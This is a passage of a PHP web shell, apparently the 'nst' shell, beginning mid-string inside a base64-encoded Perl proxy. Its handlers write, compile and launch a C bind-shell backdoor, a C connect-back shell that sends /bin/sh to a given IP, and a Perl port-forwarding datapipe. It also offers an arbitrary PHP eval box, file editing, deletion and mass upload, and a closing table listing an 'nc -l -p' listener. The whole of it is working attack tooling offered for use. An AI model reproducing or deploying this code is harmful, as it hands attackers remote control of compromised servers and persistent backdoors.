RoYXQgbGlzdGVucyB0byBhIHNwZWNpZmljIHBvcnQJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBsaXN0ZW5fdG9fcG9ydCB7DQogICAgbG9jYWwgKCRwb3J0KSA9ICRfWzFdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIsICRtYXhfcmVxdWVzdHMpOw0KICAgICRtYXhfcmVxdWVzdHMgPSAzOwkJIyBNYXggbnVtYmVyIG9mIG91dHN0YW5kaW5nIHJlcXVlc3RzDQogICAgJHNvY2tldF9mb3JtYXQgPSAnUyBuIGE0IHg4JzsNCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcGFja2VkX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICJcMFwwXDBcMCIpOw0KICAgIHNvY2tldCgkX1swXSwgJlBGX0lORVQsICZTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUgInNvY2tldDogJCEiOw0KICAgIGJpbmQoJF9bMF0sICRwYWNrZWRfcG9ydCkgfHwgZGllICJiaW5kOiAkISI7DQogICAgbGlzdGVuKCRfWzBdLCAkbWF4X3JlcXVlc3RzKSB8fCBkaWUgImxpc3RlbjogJCEiOw0KICAgICRjdXIgPSBzZWxlY3QoJF9bMF0pOyAgDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQogICAgfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tCW9wZW5fY29ubmVjdGlvbihTT0NLRVQsICRyZW1vdGVfaG9zdG5hbWUsICRwb3J0KQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgY29ubmVjdHMgdG8gYSBjZXJ0YWluIGhvc3QJCQktLQ0KIy0tCSRsb2NhbF9ob3N0X2lwIGlzIGFzc3VtZWQgdG8gYmUgbG9jYWwgaG9zdG5hbWUgSVAgYWRkcmVzcwktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBvcGVuX2Nvbm5lY3Rpb24gew0KICAgIGxvY2FsICgkcmVtb3RlX2hvc3RuYW1lLCAkcG9ydCkgPSBAX1sxLDJdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIpOw0KICAgIGxvY2FsICgkcmVtb3RlX2FkZHIsIEByZW1vdGVfaXAsICRyZW1vdGVfaXApOw0KICAgIGxvY2FsICgkbG9jYWxfcG9ydCwgJHJlbW90ZV9wb3J0KTsNCiAgICBpZiAoJHBvcnQgIX4gL15cZCskLykgew0KCSRwb3J0ID0gKGdldHNlcnZieW5hbWUoJHBvcnQsICJ0Y3AiKSlbMl07DQoJJHBvcnQgPSA2NjY3IHVubGVzcyAoJHBvcnQpOw0KICAgIH0NCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcmVtb3RlX2FkZHIgPSAoZ2V0aG9zdGJ5bmFtZSgkcmVtb3RlX2hvc3RuYW1lKSlbNF07DQogICAgaWYgKCEkcmVtb3RlX2FkZHIpIHsNCglkaWUgIlVua25vd24gaG9zdDogJHJlbW90ZV9ob3N0bmFtZSI7DQogICAgfQ0KDQogICAgQHJlbW90ZV9pcCA9IHVucGFjaygiQzQiLCAkcmVtb3RlX2FkZHIpOw0KICAgICRyZW1vdGVfaXAgPSBqb2luKCIuIiwgQHJlbW90ZV9pcCk7DQogICAgcHJpbnQgIkNvbm5lY3RpbmcgdG8gJHJlbW90ZV9pcCBwb3J0ICRwb3J0LlxuXG4iOw0KICAgICRzb2NrZXRfZm9ybWF0ID0gJ1MgbiBhNCB4OCc7DQogICAgJGxvY2FsX3BvcnQgID0gcGFjaygkc29ja2V0X2Zvcm1hdCwgJkFGX0lORVQsIDAsICRsb2NhbF9ob3N0X2lwKTsNCiAgICAkcmVtb3RlX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICRyZW1vdGVfYWRkcik7DQogICAgc29ja2V0KCRfWzBdLCAmQUZfSU5FVCwgJlNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAic29ja2V0OiAkISI7DQogICAgYmluZCgkX1swXSwgJGxvY2FsX3BvcnQpIHx8IGRpZSAiYmluZDogJCEiOw0KICAgIGNvbm5lY3QoJF9bMF0sICRyZW1vdGVfcG9ydCkgfHwgZGllICJzb2NrZXQ6ICQhIjsNCiAgICAkY3VyID0gc2VsZWN0KCRfWzBdKTsgIA0KDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQp9DQoNCg=="; if(is_writable("/tmp")){ $fp=fopen("/tmp/nst_perl_proxy.pl","w"); fwrite($fp,base64_decode($perl_proxy_scp)); passthru("nohup perl /tmp/nst_perl_proxy.pl $port &"); unlink("/tmp/nst_perl_proxy.pl"); }else{ if(is_writable(".")){ mkdir(".nst_proxy_tmp"); $fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w"); fwrite($fp,base64_decode($perl_proxy_scp)); passthru("nohup perl .nst_proxy_tmp/nst_perl_proxy.pl $port &"); unlink(".nst_proxy_tmp/nst_perl_proxy.pl"); rmdir(".nst_proxy_tmp"); } } $show_ps="1"; }#end of start perl_proxy if($_POST['c_bd']){ $port=$_POST['port']; $c_bd_scp = "#define PORT $port #include #include #include #include #include int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid; struct sockaddr_in serv_addr; struct sockaddr_in client_addr; int main () { soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (soc_des == -1) exit(-1); bzero((char *) &serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); serv_addr.sin_port = htons(PORT); soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr)); if (soc_rc != 0) exit(-1); if (fork() != 0) exit(0); setpgrp(); signal(SIGHUP, SIG_IGN); if (fork() != 0) exit(0); soc_rc = listen(soc_des, 5); if (soc_rc != 0) exit(0); while (1) { soc_len = sizeof(client_addr); soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len); if (soc_cli < 0) exit(0); cli_pid = getpid(); server_pid = fork(); if (server_pid != 0) { dup2(soc_cli,0); dup2(soc_cli,1); dup2(soc_cli,2); execl(\"/bin/sh\",\"sh\",(char *)0); close(soc_cli); exit(0); } close(soc_cli); } } "; if(is_writable("/tmp")){ $fp=fopen("/tmp/nst_c_bd.c","w"); fwrite($fp,"$c_bd_scp"); passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd"); passthru("nohup /tmp/nst_bd &"); unlink("/tmp/nst_c_bd.c"); unlink("/tmp/nst_bd"); }else{ if(is_writable(".")){ mkdir(".nst_bd_tmp"); $fp=fopen(".nst_bd_tmp/nst_c_bd.c","w"); fwrite($fp,"$c_bd_scp"); passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd"); passthru("nohup .nst_bd_tmp/nst_bd &"); unlink(".nst_bd_tmp/nst_bd"); unlink(".nst_bd_tmp/nst_c_bd.c"); rmdir(".nst_bd_tmp"); } } $show_ps="1"; }#end of c bd if($_POST['bc_c']){ # nc -l -p 4500 $port_c = $_POST['port_c']; $ip=$_POST['ip']; $bc_c_scp = "#include #include #include #include #include #include #include int fd, sock; int port = $port_c; struct sockaddr_in addr; char mesg[] = \"::Connect-Back Backdoor:: CMD: \"; char shell[] = \"/bin/sh\"; int main(int argc, char *argv[]) { while(argc<2) { fprintf(stderr, \" %s \", argv[0]); exit(0); } addr.sin_family = AF_INET; addr.sin_port = htons(port); addr.sin_addr.s_addr = inet_addr(argv[1]); fd = socket(AF_INET, SOCK_STREAM, 0); connect(fd, (struct sockaddr*)&addr, sizeof(addr)); send(fd, mesg, sizeof(mesg), 0); dup2(fd, 0); dup2(fd, 1); dup2(fd, 2); execl(shell, \"in.telnetd\", 0); close(fd); return 1; } "; if(is_writable("/tmp")){ if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");} if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");} $fp=fopen("/tmp/nst_c_bc_c.c","w"); $bd_c_scp=str_replace("!n","\n",$bd_c_scp); fwrite($fp,"$bc_c_scp"); passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c"); passthru("nohup /tmp/nst_bc_c $ip &"); unlink("/tmp/nst_bc_c"); unlink("/tmp/nst_bc_c.c"); }else{ if(is_writable(".")){ mkdir(".nst_bc_c_tmp"); $fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w"); $bd_c_scp=str_replace("!n","\n",$bd_c_scp); fwrite($fp,"$bc_c_scp"); passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c"); passthru("nohup .nst_bc_c_tmp/nst_bc_c $ip &"); unlink(".nst_bc_c_tmp/nst_bc_c.c"); unlink(".nst_bc_c_tmp/nst_bc_c"); rmdir(".nst_bc_c_tmp"); } } $show_ps="1"; }#end of back connect C if($_POST['datapipe_pl']){ $port_2=$_POST['port_2']; $port_3=$_POST['port_3']; $ip=$_POST['ip']; $datapipe_pl = " #!/usr/bin/perl # coded by CuTTer (rus hacker) use IO::Socket; use POSIX; \$localport=$port_2; \$host=\"$ip\"; \$port=$port_3; \$daemon=1; \$DIR = undef; ## �� (1-��, 0-��) \$log=0; \$| = 1; if (\$daemon){ print \"3anycKaeM daemon\n\"; \$pid = fork; exit if \$pid; die \"Couldn't fork: \$!\" unless defined(\$pid); POSIX::setsid() or die \"Can't start a new session: \$!\"; } %o = ('port' => \$localport, 'toport' => \$port, 'tohost' => \$host); \$ah = IO::Socket::INET->new( 'LocalPort' => \$localport, 'Reuse' => 1, 'Listen' => 10) || die \"�� : \$!\"; print \"�� .\n\" if \$log; \$SIG{'CHLD'} = 'IGNORE'; \$num = 0; while (1) { \$ch = \$ah->accept(); if (!\$ch) { print STDERR \"�� accept: \$!\n\"; next; } printf(\"�� : host %s, port %s.\n\", \$ch->peerhost(), \$ch->peerport()) if \$log; ++\$num; \$pid = fork(); if (!defined(\$pid)) { print STDERR \"�� fork: \$!\n\"; } elsif (\$pid == 0) { ## �� \$ah->close(); Run(\%o, \$ch, \$num); } else { print \"Parent: Fork �� , �� .\n\" if \$log; \$ch->close(); } } sub Run { my(\$o, \$ch, \$num) = @_; my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'}, 'PeerPort' => \$o->{'toport'}); print(\"Child: �� \$o->{'tohost'}, �� \$o->{'toport'}.\n\") if \$log; if (!\$th) { printf STDERR (\"Child: �� %s, �� %s.\n\", \$o->{'tohost'}, \$o->{'toport'}); exit 0; } my \$fh; if (\$o->{'dir'}) { \$fh = Symbol::gensym(); open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\") or die \"Child: �� \$o->{'dir'}/tunnel\$num.log: \$!\"; } \$ch->autoflush(); \$th->autoflush(); while (\$ch || \$th) { print \"Child: �� .\n\" if \$log; my \$rin = \"\"; vec(\$rin, fileno(\$ch), 1) = 1 if \$ch; vec(\$rin, fileno(\$th), 1) = 1 if \$th; my(\$rout, \$eout); select(\$rout = \$rin, undef, \$eout = \$rin, 120); if (!\$rout && !\$eout) { print STDERR \"Child: �� Timeout.\n\"; } my \$cbuffer = \"\"; my \$tbuffer = \"\"; if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) { print \"Child: �� .\n\" if \$log; my \$result = sysread(\$ch, \$tbuffer, 1024); if (!defined(\$result)) { print STDERR \"Child: �� : \$!\n\"; exit 0; } if (\$result == 0) { print \"Child: �� .\n\" if \$log; exit 0; } print \"Child: ��: \$cbuffer\n\" if \$log; } if (\$th && (vec(\$eout, fileno(\$th), 1) || vec(\$rout, fileno(\$th), 1))) { print \"Child: �� .\n\" if \$log; my \$result = sysread(\$th, \$cbuffer, 1024); if (!defined(\$result)) { print STDERR \"Child: �� : \$!\n\"; exit 0; } if (\$result == 0) { print \"Child: �� .\n\" if \$log; exit 0; } print \"Child: ��: \$cbuffer\n\" if \$log; } if (\$fh && \$tbuffer) { (print \$fh \$tbuffer); } while (my \$len = length(\$tbuffer)) { print \"Child: �� \$len ��.\n\" if \$log; my \$res = syswrite(\$th, \$tbuffer, \$len); print \"Child: �� .\n\" if \$log; if (\$res > 0) { \$tbuffer = substr(\$tbuffer, \$res); } else { print STDERR \"Child: �� : \$!\n\"; } } while (my \$len = length(\$cbuffer)) { print \"Child: �� \$len �� .\n\" if \$log; my \$res = syswrite(\$ch, \$cbuffer, \$len); print \"Child: �� ..\n\" if \$log; if (\$res > 0) { \$cbuffer = substr(\$cbuffer, \$res); } else { print STDERR \"Child: �� : \$!\n\"; } } } } "; if(is_writable("/tmp")){ $fp=fopen("/tmp/nst_perl_datapipe.pl","w"); fwrite($fp,"$datapipe_pl"); passthru("nohup perl /tmp/nst_perl_datapipe.pl &"); unlink("/tmp/nst_perl_datapipe.pl"); }else{ if(is_writable(".")){ mkdir(".nst_datapipe_tmp"); $fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w"); fwrite($fp,"$datapipe_pl"); passthru("nohup perl .nst_datapipe_tmp/nst_perl_datapipe.pl &"); unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl"); rmdir(".nst_datapipe_tmp"); } } $show_ps="1"; }#end of datapipe perl if($show_ps=="1"){ print "[ps ux]

"; print "
"; passthru("ps ux"); print "

"; } echo "
md5:

md5 online encoder/decoder (brutforce) (php) - [DOWNLOAD]
"; @$md5=@$_POST['md5']; if(@$_POST['md5']){ echo "md5:
".md5($md5)."";} echo "

base64 e/d:

"; if(@$_POST['base64']){ @$base64=$_POST['base64']; echo " Encode:
".base64_encode($base64)."
Decode:
".base64_decode($base64)."
";} echo "

DES:

John The Ripper [Web]

"; if(@$_POST['des']){ @$des=@$_POST['des']; echo "Des:
".crypt($des)."";} print " eval: (example: print \"Hello World\";)
<?

?>

"; function eval_sl($editf){ if(get_magic_quotes_gpc()==1){ $editf=stripslashes($editf); } return $editf; } if($_POST['eval']){ print "RESULT:

"; eval(eval_sl($_POST['eval'])); print "

"; print "PHP:
\r\n\r\n"; print "<?\r\n"; print "
"; print htmlspecialchars(eval_sl(($_POST['eval']))); print "
"; print "?>\r\n\r\n

"; } echo $copyr; exit;} if(@$_GET['replace']=="1"){ $ip=@$_SERVER['REMOTE_ADDR']; $d=$_GET['d']; $e=$_GET['e']; @$de=$d."/".$e; $de=str_replace("//","/",$de); $e=@$e; echo "[Delete] [Edit] [Filesize to 0 byte] [Replace text in file] [Download] [Rename] [CHMOD] [Copy]
"; echo " Replace tool:
(You can replace any text)
File: $de

1. Your ip.
2. microsoft.com ip :)
Replace this by this
"; if(@$_POST['doit']){ @$thisX=$_POST['thisX']; @$bythis=$_POST['bythis']; @$e=$_GET['e']; $filename="$d/$e"; $fd = @fopen ($filename, "r"); $rpl = @fread ($fd, @filesize ($filename)); $re=str_replace("$thisX","$bythis",$rpl); $x=@fopen("$d/$e","w"); @fwrite($x,"$re"); echo "
$thisX Replaced by $bythis
[VIew file]

"; } echo $copyr; exit;} if(@$_GET['t']=="upload"){ echo "
* Mass upload *
File upload:

New file name:
(if empty, it will be default)

"; if(@$_POST['uploadf']){ $where=$_POST['where']; $newf=$_POST['newf']; $where=str_replace("//","/",$where); if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;} $uploadfile = "$where/".$newf; if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) { $uploadfile=str_replace("//","/",$uploadfile); echo "
Uploaded to $uploadfile
"; }else{ echo "
Error
";} } } if(@$_GET['t']=="massupload"){ echo " Mass upload:

"; if(@$_POST['massupload']){ $where=@$_POST['where']; $uploadfile1 = "$where/".@$_FILES['text1']['name']; $uploadfile2 = "$where/".@$_FILES['text2']['name']; $uploadfile3 = "$where/".@$_FILES['text3']['name']; $uploadfile4 = "$where/".@$_FILES['text4']['name']; $uploadfile5 = "$where/".@$_FILES['text5']['name']; $uploadfile6 = "$where/".@$_FILES['text6']['name']; $uploadfile7 = "$where/".@$_FILES['text7']['name']; $uploadfile8 = "$where/".@$_FILES['text8']['name']; $uploadfile9 = "$where/".@$_FILES['text9']['name']; $uploadfile10 = "$where/".@$_FILES['text10']['name']; $uploadfile11 = "$where/".@$_FILES['text11']['name']; $uploadfile12 = "$where/".@$_FILES['text12']['name']; $uploadfile13 = "$where/".@$_FILES['text13']['name']; $uploadfile14 = "$where/".@$_FILES['text14']['name']; $uploadfile15 = "$where/".@$_FILES['text15']['name']; $uploadfile16 = "$where/".@$_FILES['text16']['name']; $uploadfile17 = "$where/".@$_FILES['text17']['name']; $uploadfile18 = "$where/".@$_FILES['text18']['name']; $uploadfile19 = "$where/".@$_FILES['text19']['name']; $uploadfile20 = "$where/".@$_FILES['text20']['name']; if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile1
";} if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile2
";} if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile3
";} if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile4
";} if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile5
";} if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile6
";} if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile7
";} if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile8
";} if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile9
";} if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile10
";} if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile11
";} if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile12
";} if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile13
";} if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile14
";} if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile15
";} if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile16
";} if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile17
";} if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile18
";} if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile19
";} if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) { $where=str_replace("\\\\","\\",$where); echo "Uploaded to $uploadfile20
";} } echo $copyr; exit;} if(@$_GET['yes']=="yes"){ $d=@$_GET['d']; $e=@$_GET['e']; unlink($d."/".$e); $delresult="Success $d/$e deleted "; } if(@$_GET['clean']=="1"){ @$e=$_GET['e']; $x=fopen("$d/$e","w"); fwrite($x,""); echo ""; exit; } if(@$_GET['e']){ $d=@$_GET['d']; $e=@$_GET['e']; $pinf=pathinfo($e); if(in_array(".".@$pinf['extension'],$images)){ echo ""; exit;} $filename="$d/$e"; $fd = @fopen ($filename, "r"); $c = @fread ($fd, @filesize ($filename)); $c=htmlspecialchars($c); $de=$d."/".$e; $de=str_replace("//","/",$de); if(is_file($de)){ if(!is_writable($de)){echo "READ ONLY
";}} echo "[Delete] [Edit] [Filesize to 0 byte] [Replace text in file] [Download] [Rename] [CHMOD] [Copy]
"; echo " File contents:
$de

$c

"; if(@$_GET['delete']=="1"){ $delete=$_GET['delete']; echo " DELETE: Are you sure?
Yes || No
"; if(@$_GET['yes']=="yes"){ @$d=$_GET['d']; @$e=$_GET['e']; echo $delresult; } if(@$_GET['no']){ echo " "; } } #end of delete echo $copyr; exit; } #end of e if(@$_GET['edit']=="1"){ @$d=$_GET['d']; @$ef=$_GET['ef']; $e=$ef; if(is_file($d."/".$ef)){ if(!is_writable($d."/".$ef)){echo "READ ONLY
";}} echo "[Delete] [Edit] [Filesize to 0 byte] [Replace text in file] [Download] [Rename] [CHMOD] [Copy]
"; $filename="$d/$ef"; $fd = @fopen ($filename, "r"); $c = @fread ($fd, @filesize ($filename)); $c=htmlspecialchars($c); $de=$d."/".$ef; $de=str_replace("//","/",$de); echo " Edit:
$de
"; if(!@$_POST['save']){ print "
$c

"; } if(@$_POST['save']){ $editf=@$_POST['editf']; if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){ $editf=stripslashes($editf); } $f=fopen($filename,"w+"); fwrite($f,"$editf"); echo "
File edited. "; exit; } echo $copyr; exit; } echo" "; $dirs=array(); $files=array(); $dh = @opendir($d) or die("

Filename Tools Size Owner/Group Perms
Permission Denied or Folder/Disk does not exist
$copyr
"); while (!(($file = readdir($dh)) === false)) { if ($file=="." || $file=="..") continue; if (@is_dir("$d/$file")) { $dirs[]=$file; }else{ $files[]=$file; } sort($dirs); sort($files); $fz=@filesize("$d/$file"); } function perm($perms){ if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } for($i=0; $i0 $linkdDIR $owner/$group$info"; } for($i=0; $i2 $files[$i][options]
Edit
Delete
CHMOD
Rename
Download
Copy
$siz$owner/$group$info"; } echo ""; echo $copyr; ?>

[Name]	[C]	[Port]	[Perl]	[Port]	[Other options, info]
Backdoor:					none
Back connect:					b.c. ip: nc -l -p 5546
Datapipe:					other serv ip: port:
Web proxy:					none
Socks 4 serv:					none
Socks 5 serv:					none